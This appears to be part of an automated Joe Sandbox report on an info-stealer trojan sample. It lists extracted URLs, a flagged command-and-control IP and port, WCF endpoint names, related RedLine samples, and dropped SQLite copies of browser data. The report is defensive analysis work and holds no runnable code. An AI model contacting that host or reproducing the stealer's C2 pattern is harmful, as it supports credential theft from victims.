https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmpA15C.tmp.2.dr, tmp6AE6.tmp.2.dr, tmp6AF7.tmp.2.dr, tmpA13B.tmp.2.dr, tmp6AC5.tmp.2.dr, tmpA14C.tmp.2.dr, tmp6AD5.tmp.2.dr, tmp6AB4.tmp.2.dr, tmp33E2.tmp.2.dr, tmp6A94.tmp.2.dr, tmp33E3.tmp.2.dr, tmpA13A.tmp.2.dr	false		high
http://www.galapagosdesign.com/DPlease	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdate	RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/0	RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ipinfo.io/ip%appdata%	Z6ojPnRBp1.exe, 00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1421293852.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://45.137.22.249:55615	RegSvcs.exe, 00000002.00000002.1423005666.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1423005666.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.datacontract.org/2004/07/	RegSvcs.exe, 00000002.00000002.1423005666.00000000030F9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	Z6ojPnRBp1.exe, 00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1421293852.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmpA13A.tmp.2.dr	false		high
https://ac.ecosia.org?q=	tmpA13A.tmp.2.dr	false		high
http://tempuri.org/Endpoint/CheckConnect	RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/v20	tmpA15C.tmp.2.dr, tmp6AE6.tmp.2.dr, tmp6AF7.tmp.2.dr, tmpA13B.tmp.2.dr, tmp6AC5.tmp.2.dr, tmpA14C.tmp.2.dr, tmp6AD5.tmp.2.dr, tmp6AB4.tmp.2.dr, tmp33E2.tmp.2.dr, tmp6A94.tmp.2.dr, tmp33E3.tmp.2.dr, tmpA13A.tmp.2.dr	false		high
http://www.fontbureau.com/designers/frere-user.html	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv20	tmpA15C.tmp.2.dr, tmp6AE6.tmp.2.dr, tmp6AF7.tmp.2.dr, tmpA13B.tmp.2.dr, tmp6AC5.tmp.2.dr, tmpA14C.tmp.2.dr, tmp6AD5.tmp.2.dr, tmp6AB4.tmp.2.dr, tmp33E2.tmp.2.dr, tmp6A94.tmp.2.dr, tmp33E3.tmp.2.dr, tmpA13A.tmp.2.dr	false		high
http://tempuri.org/Endpoint/GetUpdatesResponse	RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmpA13A.tmp.2.dr	false		high
https://gemini.google.com/app?q=	tmpA13A.tmp.2.dr	false		high
http://schemas.xmlsoap.org/soap/actor/next	RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.26.13.31	api.ip.sb.cdn.cloudflare.net	United States		13335	CLOUDFLARENETUS	false
45.137.22.249	unknown	Netherlands		51447	ROOTLAYERNETNL	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1632261
Start date and time:	2025-03-07 21:37:37 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Z6ojPnRBp1.exe renamed because original name is a hash value
Original Sample Name:	b92fbfb1456ffbbda1a668cba58533a7.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/44@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 107 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.60.203.209
Excluded domains from analysis (whitelisted): fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:38:36	API Interceptor	1x Sleep call for process: Z6ojPnRBp1.exe modified
15:38:52	API Interceptor	46x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.13.31	VKJITO.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	ip.sb/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ip.sb.cdn.cloudflare.net	UVFpX7iieV.exe	Get hash	malicious	RedLine	Browse	104.26.12.31
	MG9rMQUxSR.exe	Get hash	malicious	RedLine	Browse	104.26.13.31
	VAORjpyWdv.exe	Get hash	malicious	RedLine	Browse	104.26.13.31
	mF6d952oso.exe	Get hash	malicious	RedLine	Browse	104.26.13.31
	yGu4YUwMl6.exe	Get hash	malicious	RedLine	Browse	104.26.12.31
	824-1824-0x0000000000620000-0x0000000000A98000-memory.dmp.exe	Get hash	malicious	RedLine	Browse	172.67.75.172
	3612-1418-0x00000000009F0000-0x0000000000E68000-memory.dmp.exe	Get hash	malicious	RedLine	Browse	104.26.12.31
	Implosions.exe	Get hash	malicious	RedLine	Browse	172.67.75.172
	3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe	Get hash	malicious	RedLine	Browse	104.26.13.31
	Implosions.exe	Get hash	malicious	RedLine	Browse	104.26.12.31

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	iJIXzyHnSe.exe	Get hash	malicious	FormBook	Browse	172.67.194.22
	O20L0ptxGs.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	DayVXJx1km.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.64.1
	0V0Q7kWH0N.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.96.1
	NDCNDvC27F.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.32.1
	https://demanddistribution.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	0IrTeguWM7.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	http://rednosehorse.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	NDCNDvC27F.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.48.1
	cexqIzhyvM.exe	Get hash	malicious	GuLoader	Browse	104.21.96.1
ROOTLAYERNETNL	UVFpX7iieV.exe	Get hash	malicious	RedLine	Browse	45.137.22.247
	MG9rMQUxSR.exe	Get hash	malicious	RedLine	Browse	45.137.22.247
	VAORjpyWdv.exe	Get hash	malicious	RedLine	Browse	185.222.58.250
	yGu4YUwMl6.exe	Get hash	malicious	RedLine	Browse	185.222.58.44
	NWzeEUBQ7F.exe	Get hash	malicious	RedLine	Browse	45.137.22.234
	A18OkaGxHz.exe	Get hash	malicious	RedLine	Browse	45.137.22.234
	Uv4EriqDCj.exe	Get hash	malicious	RedLine	Browse	185.222.58.36
	nePPsHIZ1m.exe	Get hash	malicious	RedLine	Browse	45.137.22.165
	3WSFIhTu1M.exe	Get hash	malicious	RedLine	Browse	185.222.58.254
	qJ64p5G1XJ.exe	Get hash	malicious	RedLine	Browse	45.137.22.227

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	O20L0ptxGs.exe	Get hash	malicious	Snake Keylogger	Browse	104.26.13.31
	DayVXJx1km.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.26.13.31
	NDCNDvC27F.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.26.13.31
	NDCNDvC27F.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.26.13.31
	cexqIzhyvM.exe	Get hash	malicious	GuLoader	Browse	104.26.13.31
	3c638k0NJx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.13.31
	drRbNknjyb.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.13.31
	3GrfjMY0pG.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.13.31
	TfRJR0Y3uW.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.26.13.31
	DNNueAb5UZ.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.26.13.31

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2666
Entropy (8bit):	5.345804351520589
Encrypted:	false
SSDEEP:	48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHpHt1qHxLHjH4:vq5qxqdqolqztYqh3oPtI6mq7qoT5JNV
MD5:	90757169D333CB9247B01FB0CAF14023
SHA1:	C47A0AA0CBC960527EA4FA7F61AC1D08B56C23A5
SHA-256:	C04472992BF7CF58327D947D334F1105C14C5CF0D2DD0DF7E7873CAADE0EC61D
SHA-512:	A49B90272EC353DE49C508AF75C509D14A18EA50ABD1CD49BF5313A708CB9654A543E3340C74978B5756A66EF291132E93931853CAD7CC8C85450BB64A318031
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Z6ojPnRBp1.exe.log

Download File

Process:	C:\Users\user\Desktop\Z6ojPnRBp1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.337066511654157
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4xLE4qE4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzez
MD5:	D57AD127A5ACBA75AAB48EA9837668DC
SHA1:	44CEDF77707CDFE90E176F836AC6F5596EC8A01F
SHA-256:	D44E4C857ADEC2657EDEEE67750775787007B70B7CED7A4C1EF40070DDA3E48D
SHA-512:	09E72155EA88645B2A93A581589469B964B9DC7600D2BCFDB537368670E3F4598A623C198E65CF8F678B84339014B9B653F1B917BF21F9C77D9671399C72FEB9
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Temp\tmp339D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8616778647394084
Encrypted:	false
SSDEEP:	48:pMtA+IIkCVEq8Ma0D0HOlf/6ykwpLf/UUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:pOCCn8MouB6w9f/MiZqmvJKLPeymwil
MD5:	BDDE4AD11E732420E7ABCCA946B11611
SHA1:	278C3386A37BAFCA507CF4C128600B01B312DDA0
SHA-256:	099AB6B902097361832FC2485E96C71C827E722FA74C09C7D08DCE9091094C1D
SHA-512:	B29061A507FCAE2CB56155C5C911706E60C798D288968B210A1670C0F0D1D3F7B3B2B2919B946FED47C4975B157A56B557F71AE80A427C85C660F6B37153C9E8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp339E.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8616778647394084
Encrypted:	false
SSDEEP:	48:pMtA+IIkCVEq8Ma0D0HOlf/6ykwpLf/UUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:pOCCn8MouB6w9f/MiZqmvJKLPeymwil
MD5:	BDDE4AD11E732420E7ABCCA946B11611
SHA1:	278C3386A37BAFCA507CF4C128600B01B312DDA0
SHA-256:	099AB6B902097361832FC2485E96C71C827E722FA74C09C7D08DCE9091094C1D
SHA-512:	B29061A507FCAE2CB56155C5C911706E60C798D288968B210A1670C0F0D1D3F7B3B2B2919B946FED47C4975B157A56B557F71AE80A427C85C660F6B37153C9E8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp33AF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8616778647394084
Encrypted:	false
SSDEEP:	48:pMtA+IIkCVEq8Ma0D0HOlf/6ykwpLf/UUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:pOCCn8MouB6w9f/MiZqmvJKLPeymwil
MD5:	BDDE4AD11E732420E7ABCCA946B11611
SHA1:	278C3386A37BAFCA507CF4C128600B01B312DDA0
SHA-256:	099AB6B902097361832FC2485E96C71C827E722FA74C09C7D08DCE9091094C1D
SHA-512:	B29061A507FCAE2CB56155C5C911706E60C798D288968B210A1670C0F0D1D3F7B3B2B2919B946FED47C4975B157A56B557F71AE80A427C85C660F6B37153C9E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp33C0.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8616778647394084
Encrypted:	false
SSDEEP:	48:pMtA+IIkCVEq8Ma0D0HOlf/6ykwpLf/UUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:pOCCn8MouB6w9f/MiZqmvJKLPeymwil
MD5:	BDDE4AD11E732420E7ABCCA946B11611
SHA1:	278C3386A37BAFCA507CF4C128600B01B312DDA0
SHA-256:	099AB6B902097361832FC2485E96C71C827E722FA74C09C7D08DCE9091094C1D
SHA-512:	B29061A507FCAE2CB56155C5C911706E60C798D288968B210A1670C0F0D1D3F7B3B2B2919B946FED47C4975B157A56B557F71AE80A427C85C660F6B37153C9E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp33C1.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8616778647394084
Encrypted:	false
SSDEEP:	48:pMtA+IIkCVEq8Ma0D0HOlf/6ykwpLf/UUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:pOCCn8MouB6w9f/MiZqmvJKLPeymwil
MD5:	BDDE4AD11E732420E7ABCCA946B11611
SHA1:	278C3386A37BAFCA507CF4C128600B01B312DDA0
SHA-256:	099AB6B902097361832FC2485E96C71C827E722FA74C09C7D08DCE9091094C1D
SHA-512:	B29061A507FCAE2CB56155C5C911706E60C798D288968B210A1670C0F0D1D3F7B3B2B2919B946FED47C4975B157A56B557F71AE80A427C85C660F6B37153C9E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp33D1.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8616778647394084
Encrypted:	false
SSDEEP:	48:pMtA+IIkCVEq8Ma0D0HOlf/6ykwpLf/UUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:pOCCn8MouB6w9f/MiZqmvJKLPeymwil
MD5:	BDDE4AD11E732420E7ABCCA946B11611
SHA1:	278C3386A37BAFCA507CF4C128600B01B312DDA0
SHA-256:	099AB6B902097361832FC2485E96C71C827E722FA74C09C7D08DCE9091094C1D
SHA-512:	B29061A507FCAE2CB56155C5C911706E60C798D288968B210A1670C0F0D1D3F7B3B2B2919B946FED47C4975B157A56B557F71AE80A427C85C660F6B37153C9E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp33E2.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	1.1366509594298093
Encrypted:	false
SSDEEP:	192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
MD5:	C5CFBCA422AD1353E7116A02424C59FD
SHA1:	38F032839FC5E1F890FAA636390A3CC9556AD350
SHA-256:	F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
SHA-512:	94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
Malicious:	false
Preview:	SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp33E3.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	1.1366509594298093
Encrypted:	false
SSDEEP:	192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
MD5:	C5CFBCA422AD1353E7116A02424C59FD
SHA1:	38F032839FC5E1F890FAA636390A3CC9556AD350
SHA-256:	F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
SHA-512:	94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
Malicious:	false
Preview:	SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp42A0.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp42B1.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp42E1.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

